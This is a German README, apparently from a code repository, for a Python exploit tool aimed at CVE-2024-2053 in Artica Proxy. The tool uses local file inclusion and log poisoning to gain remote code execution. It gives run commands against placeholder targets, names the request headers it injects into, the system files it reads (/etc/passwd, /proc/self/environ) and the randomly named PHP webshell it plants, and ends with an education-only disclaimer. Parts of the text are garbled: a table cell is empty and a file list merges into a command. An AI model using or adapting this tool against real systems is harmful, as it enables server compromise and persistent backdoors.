
CVE-2024-2053
Dieses Python3-Skript nutzt Local File Inclusion (LFI)-Schwachstellen aus, um durch Log-Poisoning-Techniken Remote Code Execution (RCE) zu erreichen. Es wurde speziell für Artica Proxy (CVE-2024-2053) entwickelt, lässt sich aber auch auf andere LFI-Szenarien anpassen.
/etc/passwd, /proc/self/environ)git clone https://github.com/yourusername/artica-lfi-rce.git
cd artica-lfi-rce
pip3 install -r requirements.txt
python3 artica.py <target_url> <endpoint> [options]Basis: python3 artica.py http://vulnerable.com /images.listener.php
Mit Proxy: python3 artica.py https://target.com:9000 /vuln.php -p http://127.0.0.1:8080
Ausführlicher Modus: python3 artica.py http://victim.com /endpoint.php -v
SSL-Fehler ignorieren: python3 artica.py https://self-signed.com /path.php --no-verify
| Komponente | Beschreibung |
|---|---|
| Payloads |
|
| Injektionspunkte | User-Agent, Referer, Cookies, GET-Parameter |
| Webshell | Zufälliger Dateiname (shell_[TIMESTAMP].php) |
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Der Entwickler übernimmt keine Haftung und ist nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden.
MIT-Lizenz - Copyright (c) 2024